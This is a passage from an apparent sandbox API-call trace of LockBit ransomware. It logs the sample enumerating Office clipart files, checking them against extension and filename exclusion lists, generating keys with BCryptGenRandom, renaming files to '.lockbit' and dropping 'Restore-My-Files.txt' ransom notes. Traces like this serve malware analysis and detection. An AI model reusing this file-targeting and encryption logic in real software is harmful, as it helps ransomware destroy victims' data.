cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.318] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0112.497] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.497] malloc (_Size=0xa6) returned 0x77d7a8 [0112.497] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0112.497] free (_Block=0x77d7a8) [0112.497] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.497] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.497] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.498] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01167_.WMF", cAlternateFileName="")) returned 1 [0112.498] lstrcmpiW (lpString1=".", lpString2="DD01167_.WMF") returned -1 [0112.498] lstrcmpiW (lpString1="..", lpString2="DD01167_.WMF") returned -1 [0112.498] PathFindExtensionW (pszPath="DD01167_.WMF") returned=".WMF" [0112.498] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.498] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.499] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.499] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01167_.WMF") returned 1 [0112.500] lstrcmpiW (lpString1="ntldr", lpString2="DD01167_.WMF") returned 1 [0112.500] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01167_.WMF") returned 1 [0112.500] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01167_.WMF") returned -1 [0112.500] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01167_.WMF") returned -1 [0112.500] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01167_.WMF") returned 1 [0112.500] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01167_.WMF") returned 1 [0112.500] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned=".WMF" [0112.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.500] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.500] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.501] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.501] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.lockbit") returned 72 [0112.501] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.502] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.502] malloc (_Size=0x40068) returned 0x1ff1e60 [0112.502] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2080) returned 1 [0112.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0112.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0112.504] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.507] malloc (_Size=0xa6) returned 0x77d7a8 [0112.507] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.508] free (_Block=0x77d7a8) [0112.509] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.509] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.509] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01168_.WMF", cAlternateFileName="")) returned 1 [0112.509] lstrcmpiW (lpString1=".", lpString2="DD01168_.WMF") returned -1 [0112.509] lstrcmpiW (lpString1="..", lpString2="DD01168_.WMF") returned -1 [0112.509] PathFindExtensionW (pszPath="DD01168_.WMF") returned=".WMF" [0112.509] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.509] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.510] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.510] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.511] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01168_.WMF") returned 1 [0112.511] lstrcmpiW (lpString1="ntldr", lpString2="DD01168_.WMF") returned 1 [0112.511] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01168_.WMF") returned 1 [0112.511] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01168_.WMF") returned -1 [0112.511] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01168_.WMF") returned -1 [0112.511] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01168_.WMF") returned 1 [0112.511] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01168_.WMF") returned 1 [0112.512] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.512] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned=".WMF" [0112.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.512] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.512] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.513] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.513] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.lockbit") returned 72 [0112.513] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0112.514] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.514] malloc (_Size=0x40068) returned 0x3e70008 [0112.514] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2004) returned 1 [0112.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.515] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.520] malloc (_Size=0xa6) returned 0x77d7a8 [0112.520] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.521] free (_Block=0x77d7a8) [0112.521] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.521] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.521] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.521] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01169_.WMF", cAlternateFileName="")) returned 1 [0112.521] lstrcmpiW (lpString1=".", lpString2="DD01169_.WMF") returned -1 [0112.521] lstrcmpiW (lpString1="..", lpString2="DD01169_.WMF") returned -1 [0112.521] PathFindExtensionW (pszPath="DD01169_.WMF") returned=".WMF" [0112.521] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.521] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.522] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.522] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.523] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01169_.WMF") returned 1 [0112.523] lstrcmpiW (lpString1="ntldr", lpString2="DD01169_.WMF") returned 1 [0112.523] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01169_.WMF") returned 1 [0112.523] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01169_.WMF") returned -1 [0112.523] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01169_.WMF") returned -1 [0112.523] lstrcmpiW 